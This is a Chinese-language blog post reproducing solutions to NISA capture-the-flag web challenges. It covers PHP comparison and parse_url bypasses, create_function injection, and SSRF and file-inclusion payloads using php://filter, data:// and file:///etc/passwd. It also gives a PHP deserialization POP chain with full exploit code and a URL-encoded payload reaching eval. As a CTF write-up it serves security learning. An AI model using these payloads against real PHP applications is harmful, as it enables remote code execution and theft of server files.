<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="NISA的赛题复现, shiango">
    <meta name="description" content="A Freshman">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>NISA的赛题复现 | shiango</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="shiango" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">shiango</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">shiango</div>
        <div class="logo-desc">
            
            A Freshman
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/11.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">NISA的赛题复现</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/game/">
                                <span class="chip bg-color">game</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-03-29
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="NISA-web-misc-复现"><a href="#NISA-web-misc-复现" class="headerlink" title="NISA(web+misc)复现"></a>NISA(web+misc)复现</h1><p>题目环境可以在nss上面。</p>
<p>前言：</p>
<p>说来惭愧，这么久了，比赛学的不怎么样就只有被选择的份了。失落让我们不甘心，也就更加坚定了想要出成绩的执念，耐着性子坚持下来，毕竟这些也不影响我们继续学习。</p>
<p>这周想来复现一下上周的NISA，这种难度比较适合目前我来学习：</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="1-check"><a href="#1-check" class="headerlink" title="1.check"></a>1.check</h3><p>这一题在game2里面有解出来，但是当时是在网上找的一篇文章加以借鉴。</p>
<p><strong>原理</strong></p>
<p>这里主要是一个Unicode<strong>左右文本顺序</strong>的问题：</p>
<p>双向文本是指一个字符串中同时包含LTR和RTL的文文，既包含从左到右的文本又包含从右到左的文本。</p>
<p><strong>逻辑顺序与显示顺序</strong></p>
<p>在<code>Unicode</code>标准内规定为文本在内存中表示的顺序，而显示顺序就是最终显示在我们面前所看到的文本的顺序，文本的逻辑顺序和显示顺序并不一定会一致，比如对于从右向左显示的文本，显示顺序应是从右向左的，而逻辑顺序则可能是从左向右的。</p>
<p>具体可以看看这篇博客：<a target="_blank" rel="noopener" href="https://www.xiinnn.com/article/22d50835.html#%E5%8E%9F%E7%90%86%E5%89%96%E6%9E%90">https://www.xiinnn.com/article/22d50835.html#%E5%8E%9F%E7%90%86%E5%89%96%E6%9E%90</a></p>
<p><strong>摘要：</strong></p>
<p>浏览器进行解析的时候，自然是按照上方十六进制的顺序进行解析，但是解析并不代表着输出，浏览器的输出结果需要根据底层字符的含义进行输出，当浏览器看到<code>E280AE</code>时，就知道后面的字符需要<strong>从右到左</strong>显示，而解析到<code>E281A6</code>时，浏览器就会知道将后面的字符从左往右输出，也就是<code>CTFer</code>输出结果仍然为<code>CTFer</code>而不是<code>reFTC</code>。当浏览器按照这样的规则把<code>Hello</code>解析完成之后，便会根据<code>E280AE</code>的从右往左输出的原则，将<code>CTFer</code>与<code>Hello</code>两个交换顺序，最终我们在浏览器中看到的结果便是<code>HelloCTFer</code>。</p>
<h3 id="2-level-up"><a href="#2-level-up" class="headerlink" title="2.level-up"></a>2.level-up</h3><p>一些函数绕过类型：</p>
<p>MD5强比较（不能用数组绕过），</p>
<p>sha1强比较（字符串类型），</p>
<p>php字符串解析特性</p>
<p>黑名单那里把空格和点号都给禁用了，那剩下的就只有’ [ ‘号了，但是如果构造 NI[SA[ 这个参数的话还是行不通的，因为php在遇到两个’ [ ‘号时，只会把第一个’ [ ‘号转换为’ _ ‘，而第二个不会转换</p>
<p>parse_url的函数缺陷</p>
<p>在遇到严重的url不标准时，parse_url函数会返回NULL</p>
<p>最后一个考点：是之前在网上找到的一个考点</p>
<p>create_function注入达到RCE目的，输入闭合后，readfile(‘/flag’);</p>
<p>print_r(scandir(‘/‘));函数进行注入。</p>
<h3 id="3-easyssrf"><a href="#3-easyssrf" class="headerlink" title="3.easyssrf"></a>3.easyssrf</h3><p>再来看一下这一题ssrf，之前学习的是csrf,属于跨站请求伪造，基于客户端的请求伪造；ssrf服务器端请求伪造，基于服务端请求伪造。</p>
<h5 id="SSRF-服务器端请求伪造"><a href="#SSRF-服务器端请求伪造" class="headerlink" title="SSRF:服务器端请求伪造"></a>SSRF:服务器端请求伪造</h5><p>SSRF攻击的目标是从外网无法访问的<code>内部系统</code>，因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内网。也就是说可以利用一个网络请求的服务，当作跳板进行攻击。</p>
<p>PHP中下面函数的使用不当会导致SSRF:<br>file_get_contents()<br>fsockopen()<br>curl_exec()<br>这几个函数共同的特点就是 都能通过一些伪协议去访问目标服务器上的资源：</p>
<p>这种题目之前做过很多题，在dvwa里面也有。在bugku里面是将其与文件包含连用，这里是有用到相关函数，所以也可以用到这种方法。php伪协议方式有很多，这里用到的是get方式的，还可以用到post方式php://input方式，再post一个内容。</p>
<p>如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,则请做好目标地址的过滤。</p>
<h5 id="文件包含漏洞："><a href="#文件包含漏洞：" class="headerlink" title="文件包含漏洞："></a>文件包含漏洞：</h5><p>php当中会造成文件包含漏洞的函数有：include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file</p>
<p>php、data伪协议读文件和代码执行的方式：</p>
<p>?file=data:text/plain,<?php phpinfo()?>  #GET数据<br>?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=  #后面的base64字符是需要传入的字符串的base64编码<br>?file=php://input [POST DATA:]<?php phpinfo()?>  #POST数据<br>?file=php://filter/read=convert.base64-encode/resource=xxx.php  #get读源码</p>
<p><strong>php伪协议</strong></p>
<p>需要开启allow_url_fopen的：php://input、php://stdin、php://memory和php://temp</p>
<p>不需要开启allow_wrl_fopen的：php://filter</p>
<p>在CTF中经常使用的是php://filter和php://input</p>
<p>php://filter用于读取源码，php://input用于执行php代码</p>
<p>php://input需要post请求提交数据</p>
<p>php://filter可以get提交?a=php://filter/read=convert.base64-encode/resource=xxx.php</p>
<p><strong>data伪协议</strong></p>
<p>ctf常用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码</span><br><span class="line">?file=data:text/plain,&lt;?php phpinfo()?&gt; </span><br></pre></td></tr></table></figure>

<p><strong>file协议</strong></p>
<p>File:// 访问本地文件系统</p>
<p>file:// 用于访问本地文件系统，如c:盘中的东西。在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。</p>
<p>file:// [文件的绝对路径和文件名]</p>
<p>linux 系统环境下：<a target="_blank" rel="noopener" href="http://127.0.0.1/FI/LFI.php?file=file:///etc/passwd">?file=file:///etc/passwd</a></p>
<p>winows 系统环境下：<a target="_blank" rel="noopener" href="http://127.0.0.1/code/1.php?file=file:///E:%5CphpStudy%5CWWW%5Ccode%5Cphpinfo.php">file=file:///E:\phpStudy\WWW\code\phpinfo.php</a></p>
<p><strong>伪协议总结</strong><br>File协议用于读取系统文件，c盘关键内容。</p>
<p>Php://filter 用来读取文件内容，但是要base64后出来，否则会造成文件执行从而只看到执行结果。</p>
<p>Php://input（代码执行）可将post请求中的数据作为PHP代码执行。可以用于写木马。</p>
<p>Data和input相似，可以代码执行，但只有在php&lt;5.3且include=on时可以写木马。</p>
<h5 id="解答"><a href="#解答" class="headerlink" title="解答"></a>解答</h5><p>所以要用：<br>padload:file:///fl4g</p>
<p>源码：</p>
<p> highlight_file(<strong>FILE</strong>);<br> error_reporting(0);<br> $file = $_GET[“file”];<br> if (stristr($file, “file”)){ die(“你败了.”);<br> }//如果是strstr函数是可以用大小写绕或的，但是这个不行。<br> //flag in /flag<br> echo file_get_contents($file); </p>
<p>padload读取源码:</p>
<p>file=php://filter/read=convert.base64-encode/resource=/flag</p>
<h3 id="4-babyserialize"><a href="#4-babyserialize" class="headerlink" title="4.babyserialize"></a>4.babyserialize</h3><p>接着来看看两道反序列化的题型：这里应该是赛题最难的。</p>
<h5 id="pop链"><a href="#pop链" class="headerlink" title="pop链"></a>pop链</h5><p>看了一些类似题目和解释后我对pop链的浅理解：一般的序列化攻击是针对魔术方法的自动调用而触发的，当关键代码不在魔术方法里的时候就需要观察类与函数的联系，将其与魔术方法的利用结合起来，这就是pop链。</p>
<p>构造函数__construct()：当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。</p>
<p>析构函数__destruct()：当对象被销毁时会自动调用。</p>
<p>__wakeup() ：如前所提，unserialize()时会自动调用。</p>
<p>invoke()魔术方法：在类的对象被调用为函数时候，自动被调用。<br>toString()魔术方法：在类的对象被当作字符串操作的时候，自动被调用。<br>__get()魔术方法：从不可访问的属性中读取数据会触发。</p>
<p>call是魔术方法中的一个，当程序调用到当前类中未声明或没权限调用的方法时，就会调用call方法。__call()方法包含两个参数，即方法名和方法参数。其中，方法参数是以数组形式存在的。</p>
<p>_set():在给不可访问属性赋值(private,protected,不存在)时,php就会执行*set()*方法</p>
<h5 id="原生类"><a href="#原生类" class="headerlink" title="原生类"></a>原生类</h5><p>GlobIterator 遍历目录<br>GlobIterator::__construct(string $pattern, [int $flag])<br>从使用$pattern构造一个新的目录迭代</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;waf.php&quot;;</span><br><span class="line">class NISA&#123;</span><br><span class="line">    public $fun=&quot;show_me_flag&quot;;</span><br><span class="line">    public $txw4ever;</span><br><span class="line">    public function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        if($this-&gt;fun==&quot;show_me_flag&quot;)&#123;</span><br><span class="line">            hint();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __call($from,$val)&#123;</span><br><span class="line">        $this-&gt;fun=$val[0];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        echo $this-&gt;fun;</span><br><span class="line">        return &quot; &quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __invoke()</span><br><span class="line">    &#123;</span><br><span class="line">        checkcheck($this-&gt;txw4ever);</span><br><span class="line">        @eval($this-&gt;txw4ever); //关键点eval()函数。联想到一句话木马注入，所以txw4ever的内容应该是木马。</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class TianXiWei&#123;</span><br><span class="line">    public $ext;</span><br><span class="line">    public $x;</span><br><span class="line">    public function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;ext-&gt;nisa($this-&gt;x);  //这里应该可以用来实现call()方法的跳转，令ext与nisa()不相关</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Ilovetxw&#123;</span><br><span class="line">    public $huang;</span><br><span class="line">    public $su;</span><br><span class="line"></span><br><span class="line">    public function __call($fun1,$arg)&#123;</span><br><span class="line">        $this-&gt;huang-&gt;fun=$arg[0];    //</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        $bb = $this-&gt;su;</span><br><span class="line">        return $bb();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class four&#123;</span><br><span class="line">    public $a=&quot;TXW4EVER&quot;;</span><br><span class="line">    private $fun=&#x27;abc&#x27;;</span><br><span class="line"></span><br><span class="line">    public function __set($name, $value)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;$name=$value;</span><br><span class="line">        if ($this-&gt;fun = &quot;sixsixsix&quot;)&#123;</span><br><span class="line">            strtolower($this-&gt;a);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&#x27;ser&#x27;]))&#123;</span><br><span class="line">    @unserialize($_GET[&#x27;ser&#x27;]);  //调用__wakeup函数</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//func checkcheck($data)&#123;</span><br><span class="line">//  if(preg_match(......))&#123;</span><br><span class="line">//      die(something wrong);</span><br><span class="line">//  &#125;</span><br><span class="line">//&#125;</span><br><span class="line"></span><br><span class="line">//function hint()&#123;</span><br><span class="line">//    echo &quot;.......&quot;;</span><br><span class="line">//    die();</span><br><span class="line">//&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pop链：</span><br><span class="line">unserialize()函数调用的是两个__wakeup()函数，但是这里第一个没有什么特殊的注入点，所以没用。第二个可以实现无法调用方法来调用__call()方法，然后在fun属性里有一个public和一个private，我们用private可以实现没办法用赋值然后引起__set()函数，跳到four()类里面，然后通过一个字符串处理函数引发__toString()方法，return $bb();将属性作为一个方法，所以又引起__invoke()方法，然后在函数eval()形成注入。（使用赋值操作实现类的跳转）</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">TianXiWei::__wakeup() --&gt; Ilovetxw::__call() --&gt; four::__set() --&gt; Ilovetxw::__toString() --&gt; NISA::__invoke()</span><br><span class="line">示例：</span><br></pre></td></tr></table></figure>

<?php
$newclass = new GlobIterator("./*.php",0);
foreach ($newclass as $key=>$value)
        echo $key.'=>'.$value.'<br>;

?>
<p>所以exp:</p>
<p>我们可以这样写：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class NISA&#123;</span><br><span class="line">    public $fun=&quot;show_me_flag&quot;;</span><br><span class="line">    public $txw4ever;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Tianxiwei&#123;</span><br><span class="line">    public $ext;</span><br><span class="line">    public $x;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Ilovetxw&#123;</span><br><span class="line">    public $huang;</span><br><span class="line">    public $su;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class four&#123;</span><br><span class="line">    public $a=&quot;TXW4EVER&quot;;</span><br><span class="line">    private $fun=&#x27;abc&#x27;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$N1 = new NISA();</span><br><span class="line">$N1-&gt;fun = &quot;txw&quot;;</span><br><span class="line">$N1-&gt;txw4ever = &quot;echo new GlobIterator(\&quot;/f*\&quot;)&quot;;</span><br><span class="line"></span><br><span class="line">$I1 = new Ilovetxw();</span><br><span class="line">$I1-&gt;su = $N1;</span><br><span class="line"></span><br><span class="line">$f1 = new four();</span><br><span class="line">$f1-&gt;a = $I1;</span><br><span class="line"></span><br><span class="line">$I2 = new Ilovetxw();</span><br><span class="line">$I2-&gt;huang = $f1;</span><br><span class="line"></span><br><span class="line">$T1 = new TianXiWei();</span><br><span class="line">$T1-&gt;x = &quot;sixsixsix&quot;;</span><br><span class="line">$T1-&gt;ext = $I2;</span><br><span class="line">echo urlencode(serialize($T1));</span><br></pre></td></tr></table></figure>

<p>自己在写出现了一些小问题：</p>
<p><strong>Parse error: syntax error, unexpected ‘$Link’ (T_VARIABLE) in C:\phpStudy\PHPTutorial\WWW\index.php on line 12</strong>，这里一般是上下文语法有问题，检查一下;是否忘记了或是中英文问题。</p>
<p>padload:</p>
<p><a target="_blank" rel="noopener" href="http://1.14.71.254:28218/?ser=O:9:%22TianXiWei%22:2:%7Bs:3:%22ext%22;O:8:%22Ilovetxw%22:2:%7Bs:5:%22huang%22;O:4:%22four%22:2:%7Bs:1:%22a%22;O:8:%22Ilovetxw%22:2:%7Bs:5:%22huang%22;N;s:2:%22su%22;O:4:%22NISA%22:2:%7Bs:3:%22fun%22;s:3:%22txw%22;s:8:%22txw4ever%22;s:29:%22echo+new+GlobIterator(%22/f*%22);%22;%7D%7Ds:9:%22%00four%00fun%22;s:3:%22abc%22;%7Ds:2:%22su%22;N;%7Ds:1:%22x%22;s:9:%22sixsixsix%22;%7D">http://1.14.71.254:28218/?ser=O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BN%3Bs%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A3%3A%22txw%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A29%3A%22echo+new+GlobIterator%28%22%2Ff%2A%22%29%3B%22%3B%7D%7Ds%3A9%3A%22%00four%00fun%22%3Bs%3A3%3A%22abc%22%3B%7Ds%3A2%3A%22su%22%3BN%3B%7Ds%3A1%3A%22x%22%3Bs%3A9%3A%22sixsixsix%22%3B%7D</a></p>
<p><img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-02%20190354.png" alt="屏幕截图 2022-04-02 190354"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$N1-&gt;txw4ever = &quot;echo new SplFileObject(\&quot;php://filter/convert.base64-encode/resource=/fllllllaaag\&quot;);&quot;;</span><br></pre></td></tr></table></figure>

<p>wp里是这么描述的：除了GlobIterator类，还有FilesystemIterator和DirectoryIterator类也可以查找文件名，用法为DirectoryIterator(glob:///f*)，但是为了让大家知道GlobIterator类自带了glob协议查找，所以waf中过滤了glob。SplFileObject可直接配合文件名读取，wp中写伪协议也是想让大家知道这个类可以配合伪协议用</p>
<p>GlobIterator：new GlobIterator(&quot;/f*&quot;)；</p>
<p>DirectoryIterator：DirectoryIterator(glob:///f*)；</p>
<p>SplFileObject：new SplFileObject(&quot;php://filter/convert.base64-encode/resource=/fllllllaaag&quot;);</p>
